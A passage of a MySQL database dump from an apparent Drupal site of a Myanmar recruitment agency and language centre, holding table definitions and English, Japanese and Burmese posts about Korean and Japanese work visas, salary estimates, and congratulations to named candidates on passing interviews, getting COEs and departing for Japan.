('language_center', 0, 205, 721, 'ja', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
('language_center', 0, 206, 723, 'ja', 0, '<p>dsfsdfsd sdfs dfsdf</p>', '', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `node__comment`
--

CREATE TABLE `node__comment` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `comment_status` int NOT NULL DEFAULT '0' COMMENT 'Whether comments are allowed on this entity: 0 = no, 1 = closed (read only), 2 = open (read/write).'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field comment.';

-- --------------------------------------------------------

--
-- Table structure for table `node__field_activities_description`
--

CREATE TABLE `node__field_activities_description` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_activities_description_value` longtext NOT NULL,
  `field_activities_description_summary` longtext,
  `field_activities_description_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_activities_description.';

--
-- Dumping data for table `node__field_activities_description`
--

INSERT INTO `node__field_activities_description` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_activities_description_value`, `field_activities_description_summary`, `field_activities_description_format`) VALUES
('activities', 0, 7, 288, 'en', 0, '<p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 288, 'ja', 0, '<p>E-7ビザは外国人に対する特定能力を持つ方のための特別なビザであり、以下のカテゴリーに分けられています：</p><p>E-7-1ビザ（専門家）：特定の分野の管理職や専門家に対して与えられるビザです。</p><p>E-7-2ビザ（準専門職）：オフィスの仕事やサービス業に従事する方に対するビザです。</p><p>E-7-3ビザ（技術者）：技術分野で働く方に対するビザです。</p><p>E-7-4ビザ（経験豊富な技術者）：経験豊富な技術者向けのビザで、通常、5年以上の経験を持つ労働者はE-9から移行します。</p>', '', 'full_html'),
('activities', 0, 7, 288, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 8, 215, 'en', 0, '<p>&nbsp;Overtime 3 hours a day and (22) days off, After deducting money to be earned and other living and dining expenses, health insurance and income tax expenses, there may be more than 50,000,000 MMK left.</p>', '', 'full_html'),
('activities', 0, 8, 215, 'ja', 0, '<p>&nbsp;1日3時間の残業と（22日）の休暇があり、収入から差し引かれるべき金額や生活費、食費、健康保険、所得税などの経費を差し引いた後、50,000,000 MMK以上が残る可能性があります。</p>', '', 'full_html'),
('activities', 0, 8, 215, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'en', 0, '<p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'ja', 0, '<p>ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'ko', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 68, 424, 'en', 0, '<p>Congratulations for two person entering JAPAN, HOKKAIDO City with Food Service (Restaurant)</p>', '', 'full_html'),
('activities', 0, 68, 424, 'ja', 0, '<p>Congratulations for two person entering JAPAN, HOKKAIDO City with Food Service (Restaurant)</p>', '', 'full_html'),
('activities', 0, 76, 447, 'en', 0, '<p>Congratulations for Nan Su Khaing &amp; Wut Yee Aung</p>', '', 'full_html'),
('activities', 0, 76, 447, 'ja', 0, '<p>Congratulations for Nan Su Khaing &amp; Wut Yee Aung</p>', '', 'full_html'),
('activities', 0, 77, 450, 'en', 0, '<p>Congratulations to AUNG ZIN OO, HNIN EI PHYU &amp; EI SHWE ZIN!</p>', '', 'full_html'),
('activities', 0, 77, 450, 'ja', 0, '<p>Congratulations to AUNG ZIN OO, HNIN EI PHYU &amp; EI SHWE ZIN!</p>', '', 'full_html'),
('activities', 0, 78, 452, 'en', 0, '<p>Congrats to EI EI MON &amp; NYEIN EI EI SWE</p>', '', 'full_html'),
('activities', 0, 78, 452, 'ja', 0, '<p>Congrats to EI EI MON &amp; NYEIN EI EI SWE</p>', '', 'full_html'),
('activities', 0, 80, 455, 'en', 0, '<p>Congratulations SHIN THANT PHYU &amp; YAMIN THET for departure to FUKUOKA City, JAPAN!&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 80, 455, 'ja', 0, '<p>Congratulations SHIN THANT PHYU &amp; YAMIN THET for departure to FUKUOKA City, JAPAN!&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 83, 464, 'en', 0, '<p>COE For Khu Richard and Li Soung Oo</p>', '', 'full_html'),
('activities', 0, 83, 464, 'ja', 0, '<p>COE For Khu Richard and Li Soung Oo</p>', '', 'full_html'),
('activities', 0, 86, 467, 'en', 0, '<p>Getting COE For La Pyae Aung</p>', '', 'full_html'),
('activities', 0, 86, 467, 'ja', 0, '<p>Getting COE For La Pyae Aung</p>', '', 'full_html'),
('activities', 0, 87, 476, 'en', 0, '<p>Things to beware while in JAPAN</p>', '', 'full_html'),
('activities', 0, 87, 476, 'ja', 0, '<p>Things to beware while in JAPAN</p>', '', 'full_html'),
('activities', 0, 88, 471, 'en', 0, '<p>Congratulations Nilar Aung and Tin Zar Win Myint For Getting COE</p>', '', 'full_html'),
('activities', 0, 88, 471, 'ja', 0, '<p>Congratulations Nilar Aung and Tin Zar Win Myint For Getting COE</p>', '', 'full_html'),
('activities', 0, 89, 473, 'en', 0, '<p>Congratulations Thandar Moe And Pyae Sone Aung For Getting COE &nbsp;</p>', '', 'full_html'),
('activities', 0, 89, 473, 'ja', 0, '<p>Congratulations Thandar Moe And Pyae Sone Aung For Getting COE &nbsp;</p>', '', 'full_html'),
('activities', 0, 91, 480, 'en', 0, '<p>Congratulations Hnin Ei Phyu and EI shwe zin and Aung zin Oo for getting Coe</p>', '', 'full_html'),
('activities', 0, 91, 480, 'ja', 0, '<p>Congratulations Hnin Ei Phyu and EI shwe zin and Aung zin Oo for getting Coe</p>', '', 'full_html'),
('activities', 0, 92, 482, 'en', 0, '<p>Congratulations Yamin Thet And Shin Thant Phyu For Getting COE</p>', '', 'full_html'),
('activities', 0, 92, 482, 'ja', 0, '<p>Congratulations Yamin Thet And Shin Thant Phyu For Getting COE</p>', '', 'full_html'),
('activities', 0, 93, 484, 'en', 0, '<p>Congratulations khaing hnin wai and ei ei phyo and ei ei min and nan thae nu soe for getting Coe</p>', '', 'full_html'),
('activities', 0, 93, 484, 'ja', 0, '<p>Congratulations khaing hnin wai and ei ei phyo and ei ei min and nan thae nu soe for getting Coe</p>', '', 'full_html'),
('activities', 0, 94, 485, 'en', 0, '<p>Congratulations Nyein Ei Ei Shwe and EI Ei Mon For Getting COE&nbsp;</p>', '', 'full_html'),
('activities', 0, 96, 489, 'en', 0, '<p>Congralutations Nyein Ei EI Shwe And Ei Ei Mon For Getting COE</p>', '', 'full_html'),
('activities', 0, 96, 489, 'ja', 0, '<p>Congralutations Nyein Ei EI Shwe And Ei Ei Mon For Getting COE</p>', '', 'full_html'),
('activities', 0, 97, 491, 'en', 0, '<p>Congralutations Yu Yu Nway and Win pyae Shan and Khin khin kyaw and hnin thazin aung and thet myat myat khaing For Getting COE</p>', '', 'full_html'),
('activities', 0, 97, 491, 'ja', 0, '<p>Congralutations Yu Yu Nway and Win pyae Shan and Khin khin kyaw and hnin thazin aung and thet myat myat khaing For Getting COE</p>', '', 'full_html'),
('activities', 0, 99, 495, 'en', 0, '<p>Congralutations Nan Su Khaing and Wut Yee Aung For Getting COE</p>', '', 'full_html'),
('activities', 0, 99, 495, 'ja', 0, '<p>Congralutations Nan Su Khaing and Wut Yee Aung For Getting COE</p>', '', 'full_html'),
('activities', 0, 103, 505, 'en', 0, '<p>Congratulations kaw myar and bue myar shar and ei ei nyein and lay lay naing and nang bwar kyi and phray myar and thu zar aung and hnin wah khine for getting COE</p>', '', 'full_html'),
('activities', 0, 103, 505, 'ja', 0, '<p>Congratulations kaw myar and bue myar shar and ei ei nyein and lay lay naing and nang bwar kyi and phray myar and thu zar aung and hnin wah khine for getting COE</p>', '', 'full_html'),
('activities', 0, 105, 507, 'en', 0, '<p>Congratulations Hnin Wai Wai and Thidar Khine For Getting COE</p>', '', 'full_html'),
('activities', 0, 105, 507, 'ja', 0, '<p>Congratulations Hnin Wai Wai and Thidar Khine For Getting COE</p>', '', 'full_html'),
('activities', 0, 108, 513, 'en', 0, '<p>Congratulations Than Htun Naing and Aung Pyae Paing and Ei Khin and Htet Wai Aung and Lwin Phyo Ko Ko and Thae Ko Ko and Yu Yu Nyein For Getting COE</p>', '', 'full_html'),
('activities', 0, 108, 513, 'ja', 0, '<p>Congratulations Than Htun Naing and Aung Pyae Paing and Ei Khin and Htet Wai Aung and Lwin Phyo Ko Ko and Thae Ko Ko and Yu Yu Nyein For Getting COE</p>', '', 'full_html'),
('activities', 0, 111, 519, 'en', 0, '<p>Congratulations Thet myat myat khaing and khin khin kyaw and hnin thazin aung and win pyae shan and yu yu nway for departure to japan&nbsp;</p>', '', 'full_html'),
('activities', 0, 111, 519, 'ja', 0, '<p>Congratulations Thet myat myat khaing and khin khin kyaw and hnin thazin aung and win pyae shan and yu yu nway for departure to japan&nbsp;</p>', '', 'full_html'),
('activities', 0, 113, 523, 'en', 0, '<p>Congratulations Lwin Phyo Ko Ko and Aung Pyae Paing and Ei Khin and Than Htun Naing and thae ko ko and Yu yu nyein and htet lin aung for the departure to japan</p>', '', 'full_html'),
('activities', 0, 113, 523, 'ja', 0, '<p>Congratulations Lwin Phyo Ko Ko and Aung Pyae Paing and Ei Khin and Than Htun Naing and thae ko ko and Yu yu nyein and htet lin aung for the departure to japan</p>', '', 'full_html'),
('activities', 0, 146, 593, 'en', 0, '<p>Congratulations THET HTAR MYINT KO &amp; HSU MYAT HMUE &amp; HNIN YU HLAING &amp; WAI WAI KHAING &amp; CHAW HSU THWE For Passing the Interview.</p>', '', 'full_html'),
('activities', 0, 154, 609, 'en', 0, '<p>Five candidates successfully departed for Japan on 14 June 2026 to begin employment under the Specified Skilled Worker (Kaigo) Program.</p>', '', 'full_html'),
('activities', 0, 154, 609, 'ja', 0, '<p>2026年6月14日、特定技能（介護）として5名の候補者が日本へ出発しました。</p>', '', 'full_html'),
('activities', 0, 156, 613, 'en', 0, '<p>On April 21, 2026, Ms. Thwel Thwel Aye successfully departed for Japan to begin her new career in the restaurant industry under the Specified Skilled Worker program.</p>', '', 'full_html'),
('activities', 0, 156, 613, 'ja', 0, '<p>2026年4月21日、当機関を通じて採用された候補生、Thwel Thwel Ayeさんが特定技能（外食業）で日本へ出発いたしました。</p>', '', 'full_html'),
('activities', 0, 157, 615, 'en', 0, '<p>On April 26, 2026, nine candidates from New Comet Agency successfully departed for Japan to begin their careers in the restaurant industry under the Specified Skilled Worker program.</p>', '', 'full_html'),
('activities', 0, 157, 615, 'ja', 0, '<p>2026年4月26日、当機関を通じて採用された候補生9名が、特定技能（外食業）で日本へ出発いたしました。</p>', '', 'full_html'),
('activities', 0, 160, 660, 'en', 0, '<p><strong>Ms. Toe Toe Hlaing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3>&nbsp;</h3>', '', 'full_html'),
('activities', 0, 160, 660, 'ja', 0, '<p><strong>TOE TOE HLAING さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 161, 659, 'en', 0, '<p data-start=\"122\" data-end=\"246\"><strong data-start=\"122\" data-end=\"246\">Ms. Myat Thandar Kyaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3 data-start=\"248\" data-end=\"264\">&nbsp;</h3>', '', 'full_html'),
('activities', 0, 161, 659, 'ja', 0, '<p>MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 164, 629, 'en', 0, '<p>Ms. Su Myat Win successfully departed for Japan on 14 June 2026 to begin her career under the Specified Skilled Worker (Hotel) Program.</p>', '', 'full_html'),
('activities', 0, 164, 629, 'ja', 0, '<p>SU MYAT WIN さんが2026年6月14日に特定技能（宿泊）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 165, 631, 'en', 0, '<p>Four candidates successfully departed for Japan on 3 June 2026 to begin their careers under the Specified Skilled Worker (Kaigo) Program.</p>', '', 'full_html'),
('activities', 0, 165, 631, 'ja', 0, '<p data-start=\"1146\" data-end=\"1189\"><strong data-start=\"1146\" data-end=\"1189\">2026年6月3日、4名の候補者が特定技能（介護）として日本へ出発されました。</strong></p>', '', 'full_html'),
('activities', 0, 166, 634, 'en', 0, '<p><strong>Ms. Thu Thu Aung successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</strong></p><h3>&nbsp;</h3>', '', 'full_html'),
('activities', 0, 166, 634, 'ja', 0, '<p><strong>THU THU AUNG さんが特定技能（宿泊）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 167, 636, 'en', 0, '<p>Four candidates successfully departed for Japan on 23 April 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 167, 636, 'ja', 0, '<p>2026年4月23日、4名の候補者が特定技能（外食業）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 168, 638, 'en', 0, '<p>Ms. Win Htet Htet Aung successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p>', '', 'full_html'),
('activities', 0, 168, 638, 'ja', 0, '<p>WIN HTET HTET AUNG さんが特定技能（宿泊）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 169, 640, 'en', 0, '<p><strong>Three candidates successfully departed for Japan on 10 May 2026 under the Specified Skilled Worker (Kaigo) Program.</strong></p>', '', 'full_html'),
('activities', 0, 169, 640, 'ja', 0, '<p><strong>2026年5月10日、3名の候補者が特定技能（介護）として日本へ出発されました。</strong></p>', '', 'full_html'),
('activities', 0, 170, 642, 'en', 0, '<p><strong>Ms. Aye Aye Myint successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 170, 642, 'ja', 0, '<p><strong>AYE AYE MYINT さんが特定技能（介護）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 171, 644, 'en', 0, '<p><strong>Ms. May Phyoe Thu successfully departed for Japan on 26 April 2026 under the Specified Skilled Worker (Kaigo) Program.</strong></p>', '', 'full_html'),
('activities', 0, 171, 644, 'ja', 0, '<p><strong>MAY PHYOE THU さんが2026年4月26日に特定技能（介護）として日本へ出発されました</strong></p>', '', 'full_html'),
('activities', 0, 173, 648, 'en', 0, '<p><strong>Nine candidates departed for Japan on 22 April 2026 under the Specified Skilled Worker (Food Service) Program.</strong></p>', '', 'full_html'),
('activities', 0, 173, 648, 'ja', 0, '<p><strong>2026年4月22日、9名の候補者が特定技能（外食業）として日本へ出発されました。</strong></p>', '', 'full_html'),
('activities', 0, 174, 650, 'en', 0, '<p>Ms. Shwe Zin Phyo successfully departed for Japan on 1 April 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 174, 650, 'ja', 0, '<p>SHWE ZIN PHYO さんが2026年4月1日に特定技能（外食業）として日本へ出発されました</p>', '', 'full_html'),
('activities', 0, 175, 652, 'en', 0, '<p>Ms. Win Win Thu successfully departed for Japan on 29 March 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 175, 652, 'ja', 0, '<p>WIN WIN THU さんが2026年3月29日に特定技能（外食業）として日本へ出発されました</p>', '', 'full_html'),
('activities', 0, 176, 654, 'en', 0, '<p>Two candidates successfully departed for Japan on 5 March 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 176, 654, 'ja', 0, '<p>2026年3月5日、2名の候補者が特定技能（外食業）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 177, 656, 'en', 0, '<p>Ms. Tun Eaindra Moe successfully departed for Japan on 12 February 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 177, 656, 'ja', 0, '<p>TUN EAINDRA MOE さんが2026年2月12日に特定技能（外食業）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 178, 662, 'en', 0, '<p>Ms. Phyo Thiri Htet successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p>', '', 'full_html'),
('activities', 0, 178, 662, 'ja', 0, '<p>PHYO THIRI HTET さんが特定技能（介護）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 179, 664, 'en', 0, '<p>Ms. Myat Thandar Kyaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 179, 664, 'ja', 0, '<p>MYAT THANDAR KYAW さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 180, 667, 'en', 0, '<p>Ms. Hsu Wyne Wyne Pyae successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 180, 667, 'ja', 0, '<p>HSU WYNE WYNE PYAE さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 181, 669, 'en', 0, '<p>Ms. Su Su San successfully passed the JLPT N3 Examination after completing N5, N4, and N3 studies at New Comet Language Center.</p>', '', 'full_html'),
('activities', 0, 181, 669, 'ja', 0, '<p>SU SU SAN さんがニューコメット日本語学校で学習し、JLPT N3試験に合格されました。</p>', '', 'full_html'),
('activities', 0, 182, 671, 'en', 0, '<p data-start=\"205\" data-end=\"335\"><strong data-start=\"205\" data-end=\"335\">Ms. Aye Thazin successfully passed the JLPT N3 Examination after studying N5, N4, and N3 courses at New Comet Language Center.</strong></p>', '', 'full_html'),
('activities', 0, 182, 671, 'ja', 0, '<p data-start=\"205\" data-end=\"335\"><strong data-start=\"205\" data-end=\"335\">AYE THAZIN さんがニューコメット日本語学校で学習し、JLPT N3試験に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 183, 673, 'en', 0, '<p data-start=\"238\" data-end=\"377\"><strong data-start=\"238\" data-end=\"377\">Ms. Aye Pwint Phyu successfully passed the JLPT N3 Examination after completing Japanese language studies at New Comet Language Center.</strong></p>', '', 'full_html'),
('activities', 0, 183, 673, 'ja', 0, '<p data-start=\"238\" data-end=\"377\"><strong data-start=\"238\" data-end=\"377\">AYE PWINT PHYU さんがニューコメット日本語学校で学習し、JLPT N3試験に合格されました</strong></p>', '', 'full_html'),
('activities', 0, 184, 675, 'en', 0, '<p>Ms. Ei Ei Phyoe and Ms. Moe Moe Zaw departed for Japan on 26 January 2026 under the Specified Skilled Worker (Food Service) Program.</p>', '', 'full_html'),
('activities', 0, 184, 675, 'ja', 0, '<p>EI EI PHYOE さんと MOE MOE ZAW さんが2026年1月26日に特定技能（外食業）として日本へ出発されました。</p>', '', 'full_html'),
('activities', 0, 185, 678, 'en', 0, '<p>Ms. Hnin Wa Than successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 185, 678, 'ja', 0, '<p data-start=\"1220\" data-end=\"1263\"><strong data-start=\"1220\" data-end=\"1263\">HNIN WA THAN さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 186, 680, 'en', 0, '<p>Ms. Yadana Lwin successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 186, 680, 'ja', 0, '<p>YADANA LWIN さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 187, 682, 'en', 0, '<p data-start=\"260\" data-end=\"380\"><strong data-start=\"260\" data-end=\"380\">Ms. Khit Yuya Soe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 187, 682, 'ja', 0, '<p data-start=\"260\" data-end=\"380\"><strong data-start=\"260\" data-end=\"380\">KHIT YUYA SOE さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 188, 684, 'en', 0, '<p>Ms. May Phyoe Thu successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p>', '', 'full_html'),
('activities', 0, 188, 684, 'ja', 0, '<p>MAY PHYOE THU さんが特定技能（介護）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 189, 686, 'en', 0, '<p data-start=\"229\" data-end=\"341\"><strong data-start=\"229\" data-end=\"341\">Ms. Thet Mon Soe successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 189, 686, 'ja', 0, '<p data-start=\"229\" data-end=\"341\"><strong data-start=\"229\" data-end=\"341\">THET MON SOE さんが特定技能（介護）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 190, 689, 'en', 0, '<p data-start=\"241\" data-end=\"361\"><strong data-start=\"241\" data-end=\"361\">Ms. Wai Mon Thant successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 190, 689, 'ja', 0, '<p data-start=\"241\" data-end=\"361\"><strong data-start=\"241\" data-end=\"361\">WAI MON THANT さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 191, 691, 'en', 0, '<p data-start=\"255\" data-end=\"372\"><strong data-start=\"255\" data-end=\"372\">Ms. Ei Ei Khet successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p><h3 data-start=\"374\" data-end=\"390\">&nbsp;</h3>', '', 'full_html'),
('activities', 0, 191, 691, 'ja', 0, '<p><strong data-start=\"255\" data-end=\"372\">EI EI KHET さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 192, 693, 'en', 0, '<p>Ms. Sabi Oo successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 192, 693, 'ja', 0, '<p data-start=\"1161\" data-end=\"1199\"><strong data-start=\"1161\" data-end=\"1199\">SABI OO さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 193, 696, 'en', 0, '<p data-start=\"239\" data-end=\"361\"><strong data-start=\"239\" data-end=\"361\">Ms. Thwel Thwel Aye successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 193, 696, 'ja', 0, '<p data-start=\"239\" data-end=\"361\"><strong data-start=\"239\" data-end=\"361\">THWEL THWEL AYE さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 194, 698, 'en', 0, '<p data-start=\"228\" data-end=\"346\"><strong data-start=\"228\" data-end=\"346\">Ms. Moe Moe Zaw successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 194, 698, 'ja', 0, '<p data-start=\"228\" data-end=\"346\"><strong data-start=\"228\" data-end=\"346\">MOE MOE ZAW さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
